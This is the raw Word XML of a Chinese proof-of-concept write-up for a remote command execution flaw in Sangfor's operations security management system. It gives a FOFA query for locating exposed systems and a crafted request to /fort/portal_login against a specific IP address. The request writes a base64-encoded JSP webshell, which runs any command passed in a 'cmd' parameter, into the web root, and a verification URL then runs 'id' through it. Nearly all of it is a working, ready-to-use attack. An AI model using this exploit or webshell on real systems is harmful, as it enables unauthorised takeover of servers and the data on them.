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0A5C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深信服运维安全管理系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> portal_login 远程命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF6FDE1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19127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FOFA：body="/fort/login" &amp;&amp; header="FORTSESSIONID"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1DB5FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C1FD14A"/>
    <w:p w14:paraId="4E8DF52D"/>
    <w:p w14:paraId="777EF73D"/>
    <w:p w14:paraId="08541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5370A20C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45EA580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/fort/portal_login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5B2A468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115.231.7.254:1443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F7E22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text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3C639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br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66152CB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zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5105E35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4F06341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3D8E86"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56592FF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C5F71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rv:131.0)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Gecko/20100101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Firefox/131.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26380A8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</w:p>
    <w:p w14:paraId="5C2D12E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PCUgamF2YS5pby5JbnB1dFN0cmVhbSBpbiA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKS5nZXRJbnB1dFN0cmVhbSgpO2ludCBhID0gLTE7Ynl0ZVtdIGIgPSBuZXcgYnl0ZVsyMDQ4XTtvdXQucHJpbnQoIjxwcmU+Iik7d2hpbGUoKGE9aW4ucmVhZChiKSkhPS0xKXtvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIsMCxhKSk7fW91dC5wcmludCgiPC9wcmU+Iik7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPg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==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 xml:space="preserve"> |base64 -d &gt;/usr/local/tomcat/webapps/fort/gw/poiu.jsp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="808184"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225FCD78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D6CBED">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="43D3224C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F4A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漏洞验证路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6BE30C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF5983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/fort/gw/poiu.jsp?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cmd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id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374D48B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115.231.7.254:1443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674B8C9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24236AA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13BA5"/>
    <w:rsid w:val="0AA74DF8"/>
    <w:rsid w:val="30EB518F"/>
    <w:rsid w:val="42E23CB9"/>
    <w:rsid w:val="465A6FD2"/>
    <w:rsid w:val="4BB01D75"/>
    <w:rsid w:val="4C0E6189"/>
    <w:rsid w:val="75CE6659"/>
    <w:rsid w:val="7E97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1051</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1082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2025-07-02T14:08:00Z</dcterms:created>
  <dc:creator>Admin</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:18:24Z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AEA703F120994C90A2B0F475C2B79CE3_12</vt:lpwstr>
  </property>
</Properties>
</file>